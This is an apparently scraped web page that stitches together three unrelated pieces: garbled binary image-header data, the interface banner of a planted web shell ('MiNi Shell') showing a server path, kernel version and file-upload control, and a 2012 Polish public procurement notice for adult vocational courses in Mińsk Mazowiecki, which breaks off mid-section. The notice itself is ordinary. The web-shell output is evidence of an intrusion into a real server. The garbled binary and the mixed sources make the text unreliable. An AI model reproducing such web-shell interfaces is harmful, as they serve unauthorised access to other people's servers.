JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120604/186666-N-2012.html

<p class="kh_header"><b>Mińsk Mazowiecki: Organizacja i prowadzenie kursu księgowości wspomaganej techniką komputerową, kursu kadry i płace, kursu obsługi programu AutoCAD, kursu komputerowego z zakresu tworzenia stron internetowych z elementami programów graficznych, kursu komputerowego z zakresu obsługi programów Microsoft Office, kursu obsługi kasy fiskalnej, kursu fryzjerstwa, kursu kosmetyki z elementami wizażu, kursu stylizacji paznokci, kursu masażu I stopnia w ramach projektu systemowego Wsparcie na starcie</b><br>
<b>Numer ogłoszenia: 186666 - 2012; data zamieszczenia: 04.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Konstytucji 3 Maja 16, 05-300 Mińsk Mazowiecki, woj. mazowieckie, tel. 25 756 40 26, faks 25 756 40 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr-minskmaz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i prowadzenie kursu księgowości wspomaganej techniką komputerową, kursu kadry i płace, kursu obsługi programu AutoCAD, kursu komputerowego z zakresu tworzenia stron internetowych z elementami programów graficznych, kursu komputerowego z zakresu obsługi programów Microsoft Office, kursu obsługi kasy fiskalnej, kursu fryzjerstwa, kursu kosmetyki z elementami wizażu, kursu stylizacji paznokci, kursu masażu I stopnia w ramach projektu systemowego Wsparcie na starcie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A.Przedmiotem zamówienia jest organizacja i przeprowadzenie 10 odrębnych części (zadania opisano w każdej części): Zadanie nr 1 Kurs Księgowość wspomagana techniką komputerową (120 godzin  przy czym 1 godz.= 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 6 osób, Zadanie nr 2 Kurs Kadry i płace (90 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 5 osób, Zadanie nr 3 Kurs obsługi programu Auto-CAD (60 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 2 osób, Zadnie nr 4 Kurs komputerowy z zakresu tworzenia stron internetowych z elementami programów graficznych (60 godzin- przy czym 1 godz.= 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 2 osób, Zadanie nr 5 Kurs komputerowy z zakresu obsługi programów Microsoft Office (40 godzin- przy czym 1 godz.= 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 20 osób, Zadanie nr 6 Kurs Obsługa kasy fiskalnej (30 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 15 osób, Zadanie nr 7 Kurs fryzjerstwa (120 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 4 osób, Zadanie nr 8 Kurs Kosmetyka z elementami wizażu (60 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 8 osób, Zadanie nr 9 Kurs Stylizacji paznokci (40 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 6 osób, Zadanie nr 10 Kurs Masażu I stopnia (80 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 1 osoby.B. B.Uczestnikami/uczestniczkami projektu Wsparcie na starcie w stosunku, do których zaplanowano ww. działania są osoby niepełnosprawne ruchowo i/lub intelektualnie, usamodzielniający się wychowankowie placówek opiekuńczo-wychowawczych i rodzin zastępczych, osoby zagrożone wykluczeniem społecznym, korzystające ze świadczeń pomocy społecznej, osoby w wieku aktywności zawodowej (15-64 lat), zamieszkujące w powiecie mińskim. Odbiorcami usługi są osoby bezrobotne, nieaktywne zawodowo jak i osoby zatrudnione. 
C. Wykonawca ubezpiecza uczestników/uczestniczki kursu od następstw nieszczęśliwych wypadków w trakcie kursu oraz w drodze na kurs i z kursu.
D. Zamawiający wymaga zapewnienia uczestnikom/uczestniczkom kursu każdego dnia zajęć serwisu kawowego w postaci: 
a)	napojów gorących (min. 2 herbaty, 1 kawa), 
b)	suszu konferencyjnego (ciasteczka, paluszki itp.),
c)	1 litr napojów chłodzących, serwowanych w naczyniach jednorazowego użytku. 
E. Miejscem wykonywania usług będzie miasto Mińsk Mazowiecki lub inne miasto 
w województwie mazowieckim posiadające bezpośrednie połączenie międzymiastowe (PKP, PKS) relacji  Mińsk Mazowiecki - miejsce wykonania usługi. Dojazd do miejsca kursu nie może przekraczać 2 godzin zegarowych ww. środkami transportu w jedną stronę.
F. W trakcie kursu uczestnicy/uczestniczki otrzymują bezpłatnie od Wykonawcy materiały szkoleniowe (skrypt i długopis).
G. Program kursu Wykonawca przedkłada wraz z ofertą Kurs musi być zrealizowany wg. programu stanowiącego załącznik do oferty (wg. załącznika nr 11 do SIWZ) i musi zawierać wszelkie elementy wymienione w § 75 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy 
(Dz. U. z 2010 r. Nr 177 poz. 1193 z późn. zm) tj.: 
a)	nazwę i zakres szkolenia, 
b)	czas trwania i sposób organizacji szkolenia, 
c)	wymagania wstępne dla uczestników szkolenia, 
d)	cele szkolenia, 
e)	plan nauczania, określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem 
części teoretycznej i części praktycznej, 
f)	opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych, 
g)	wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, 
h)	przewidziane sprawdziany i egzaminy. 
H. Zamawiający dopuszcza możliwość dołączenia uczestników/uczestniczek kursu/kursów będących przedmiotem zamówienia do innych grup realizujących tożsame kursy prowadzone przez Wykonawcę. 
I. Po wyborze najkorzystniejszej oferty Wykonawca, którego oferta została uznana 
za najkorzystniejszą w porozumieniu z Zamawiającym przedkłada wstępny harmonogram realizacji zadania mieszczący się w przedziale czasowym podanym w rozdziale X..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	podpisane Oświadczanie o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ);
b)	dokument, wydany przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, potwierdzający posiadanie przez tę instytucję wpisu do Rejestru Instytucji Szkoleniowych (Podmiot ubiegający się o zamówienie musi na czas składania ofert przedłożyć dokument potwierdzający posiadanie statusu instytucji szkoleniowej na rok 2012). 
Ocena spełnienia ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli  wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej trzech usług szkoleniowych  
o tym samym lub zbliżonym zakresie tematycznym (właściwym dla każdego zadania). Przez usługę Zamawiający rozumie zrealizowanie grupowego szkolenia/kursu dla min. 5 osób bądź realizację usług dla 5 indywidualnych klientów. Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie wykazu wykonanych usług w wyżej opisanym zakresie (załącznik nr 4 do SIWZ) i załączonych do wykazu potwierdzeń  należycie wykonanych usług (w postaci listów referencyjnych, zaświadczeń o przeprowadzeniu usług, umów z potwierdzeniem należytego wykonania usług, protokołów odbioru itp.). Przedłożone dokumenty muszą zawierać 
w szczególności datę wykonanej usługi oraz liczbę przeszkolonych osób.
Ocena spełnienia ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o posiadaniu potencjału technicznego (załącznik nr 8 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie złożonego przez Wykonawcę wykazu osób (załącznik nr 5 do SIWZ), które będą uczestniczyć w wykonywaniu zamówienia oraz zobowiązania do współpracy zawierającego oświadczenie osoby dot. jej wykształcenia i doświadczenia (załącznik nr 6 do SIWZ).  W tabeli wymieniona zostanie kadra dydaktyczna legitymująca się wykształceniem uprawniającym do prowadzenia szkolenia/kursu tj. wykształceniem w zakresie zagadnień realizowanych 
w zamówieniu oraz doświadczeniem. 
Osoba przewidziana do realizacji zamówienia powinna posiadać doświadczenie i w ostatnich 
3 latach przed upływem terminu składania ofert, przeprowadziła min. 3 szkolenia/kursy 
o tematyce zbliżonej do przedmiotu zamówienia. Zamawiający dokona oceny warunku w oparciu 
o informacje zawarte w oświadczeniu stanowiącym załącznik nr 6 do SIWZ.
Ocena spełnienia ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu 
na podstawie oświadczenia o braku podstaw o wykluczeniu (załącznik nr 3 do SIWZ). 
Ocena spełnienia ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zobowiązanie do współpracy zawierające oświadczenie o wykształceniu i doświadczeniu (sporządzone według załącznika nr 6 do SIWZ);
Informacje o zleceniu wykonania przedmiotu zamówienia podwykonawcom (sporządzone według załącznika nr 7 do SIWZ) w sytuacji zlecenia zamówienia do załącznika należy dołączyć zobowiązanie o którym mowa w rozdziale XIII pkt 4 SIWZ;
Oświadczenie o potencjale technicznym (sporządzone według załącznika nr 8 do SIWZ);
Oświadczenie wykonawcy złożone dla celów zgłoszenia do ZUS i US (dotyczy osób fizycznych - sporządzone według załącznika nr 9 do SIWZ);
Oświadczenie Wykonawcy o niezatrudnieniu w instytucji uczestniczącej w realizacji POKL (sporządzone według załącznika nr 10 do SIWZ);
Aktualny wpis do rejestru instytucji szkoleniowych w Wojewódzkim Urzędzie Pracy właściwym ze względu na siedzibę instytucji szkoleniowej (oraz potwierdzenie, iż posiada status instytucji szkoleniowej na 2012 r.).
Program kursu  (sporządzony według. załącznika do SIWZ  nr 11).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie wykonawcy - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy w następujących przypadkach:
1.	w przypadku zmniejszenia lub zwiększenia ilości uczestników/uczestniczek, wynagrodzenie podlega odpowiedniemu zmniejszeniu lub podwyższeniu - Wykonawca zobowiązany jest niezwłocznie powiadomić na piśmie Zamawiającego o zmianie ilości osób, Zamawiający zobowiązany jest niezwłocznie powiadomić Wykonawcę o zmianie ilości osób. 
2.	w przypadku zmiany osób wskazanych w ofercie do wykonywania zamówienia z przyczyn niemożliwych wcześniej do przewidzenia (szczególnie uzasadnione przypadki: zgon, choroba lub inna sytuacja losowa), pod warunkiem posiadania przez nich wymaganych  kwalifikacji - na wniosek Wykonawcy po uzasadnieniu i uzgodnieniu w formie pisemnej z Zamawiającym
i pod warunkiem wyrażenia przez Zamawiającego zgody.
3.	w przypadku zmiany terminu realizacji usługi z przyczyn niezależnych od Zamawiającego i/lub Wykonawcy.
4.	w przypadku zmiany miejsca realizacji kursu, przy czym lokalizacja nie może pozostawać 
w sprzeczności z wymaganiami Zamawiającego postawionymi w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-minskmaz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
ul. Konstytucji 3 Maja 16
05-300 Mińsk Mazowiecki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2012 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
ul. Konstytucji 3 Maja 16
05-300 Mińsk Mazowiecki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Wsparcie na starcie współfinansowany jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego,  Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie. 
Projekt realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs Księgowość wspomagana techniką komputerową.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Księgowość wspomagana techniką komputerową (120 godzin  przy czym 1 godz.= 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 6 osób. Zamawiający zastrzega sobie możliwość zmiany liczby uczestników/uczestniczek zgodnie 
z dopuszczalnymi zmianami umowy. Kurs powinien odbywać się w systemie dziennym/popołudniowym. Zamawiający zastrzega sobie możliwość zmiany systemu 
w zależności od aktualnych potrzeb uczestników/uczestniczek projektu (po uzgodnieniu 
z Wykonawcą). Osoby biorące udział w kursie/szkoleniu nie miały do tej pory styczności z pracą w księgowości a wiążą z nim swój dalszy rozwój zawodowy. 
Minimalny zakres tematyczny kursu:
System finansowo - księgowy- Rewizor i Symfonia 
Formy działalności gospodarczej 
Podstawowe zagadnienia prawa podatkowego 
Podstawowe zagadnienia prawa pracy 
Podstawowe zagadnienia ubezpieczeń społecznych 
Zasady rachunkowości 
Komputerowa Księga Przychodów i Rozchodów - Rachmistrz 
Dokumentacja Zus - Płatnik i Płatnik - Przekaz Elektroniczny 
Arkusz kalkulacyjny EXCEL w księgowości
Program kursu Wykonawca przedkłada wraz z ofertą w zał nr 11. Program szkolenia musi być opracowany zgodnie z Rozporządzeniem MEN z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31 poz. 216 z późn. zm.). 
Kurs kończy się egzaminem (Egzamin nie jest wliczony w liczbę godzin kursu) oraz wydaniem zaświadczeń o ukończeniu. 
Wykonawca musi zapewnić w trakcie kursu warunki nauki i pracy zgodne z przepisami bezpieczeństwa i higieny pracy, pomieszczenia, w których realizowane będą zajęcia winny być bezwzględnie dostosowane do prowadzenia zajęć (pod względem wielkości sal i wyposażenia) 
z odpowiednim oświetleniem, wentylacją i akustyką. Każdy uczestnik/uczestniczka musi mieć dostęp do podstawowych urządzeń i sprzętu (krzesło, stół) oraz do innego sprzętu wykorzystywanego w trakcie uczestnictwa w kursie - komputera z odpowiednim oprogramowaniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs Kadry i płace.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Kadry i płace (90 godzin przy czym 1 godz. = 45 min zajęć i 15 min. przerwy, długość przerw może być ustalona w sposób elastyczny) dla 5 osób. Zamawiający zastrzega sobie możliwość zmiany liczby uczestników/uczestniczek zgodnie z dopuszczalnymi zmianami umowy. Kurs powinien odbywać się w systemie weekendowym. Zamawiający zastrzega sobie możliwość zmiany systemu w zależności od aktualnych potrzeb uczestników/uczestniczek projektu 
(po uzgodnieniu z Wykonawcą). Osoby biorące udział w kursie/szkoleniu nie miały do tej pory styczności z pracą w tym charakterze a wiążą z nią swój dalszy rozwój zawodowy. 
Kurs powinien obejmować organizację komórki ds. kadrowych, wybrane zagadnienia z prawa pracy, wybrane zagadnienia z bhp, organizację komórki ds. płac, systemy wynagradzania, listy płac, obsługa kadrowo-płacowych programów komputerowych-program Płatnik i Symfonia. Osoby biorące udział w kursie/szkoleniu nie miały do tej pory styczności z ww. zagadnieniami. Program kursu Wykonawca przedkłada wraz z ofertą w zał nr 11. Program szkolenia musi być opracowany zgodnie z Rozporządzeniem MEN z dnia 3 lutego 2006 r. w sprawie uzyskiwania 
i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych 
w formach pozaszkolnych (Dz. U. Nr 31 poz. 216 z późn. zm.). 
Wykonawca winien zapewnić każdemu uczestnikowi szkolenia osobny komputer z odpowiednim oprogramowaniem.
Kurs kończy się egzaminem (Egzamin nie jest wliczony w liczbę godzin kursu) oraz wydaniem zaświadczeń o ukończeniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
